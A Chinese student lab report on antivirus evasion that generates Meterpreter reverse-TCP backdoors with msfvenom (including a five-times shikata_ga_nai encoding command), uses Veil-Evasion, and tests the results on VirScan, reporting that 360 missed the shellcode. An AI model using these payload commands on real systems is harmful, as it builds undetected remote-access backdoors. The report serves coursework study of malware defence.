20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
实验目的
通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力。
实验内容
(1)用VirScan来检测后门
(2)Msfvenom使用编码器
(3)Veil-Evasion
(4)C语言调用Shellcode
实验一 用VirScan来检测后门
按理说检查的应该是实验二生成的后门,但是,我用VirScan检验后门时,出现了一个让我意想不到的情况
让我十分的震惊了
任务二 Msfvenom使用编码器
重复编码,输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=[本机IP] LPORT=5235 -f exe > 5235Backdoor.exe
结果一样,内心崩溃。
任务三 Veil-Evasion
安装Veil-Evasion
因为我的虚拟机不能直接通过 sudo apt-get install
安装,所以我参考了一下周泽堃同学第三次实验博客中关于Veil-Evasion的安装方法,然而,也失败了,最后经过了一番波折,我最终选择,拷贝了其他同学下好的Veil-Evasion。
使用Veil-Evasion
输入 veil
,用 use evasion
, list payloads
,进入到payloads模板界面,经过一番操作后,成功生成
任务四 C语言调用Shellcode
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali IP] LPORT=5235 -f c
生成C语言代码,C语言代码就不贴了
回连监听
用 VirScan检测,结果为
经过5次重复编译后,用VirScan检测结果为
后记
实验成功真是可喜可贺,比较开心的是最后shellcode生成的C语言代码,无论是编译1次还是编译5次,奇虎360都没有检测出来,这让我无比的开心。但是我博客交的有些晚了,对不起老师!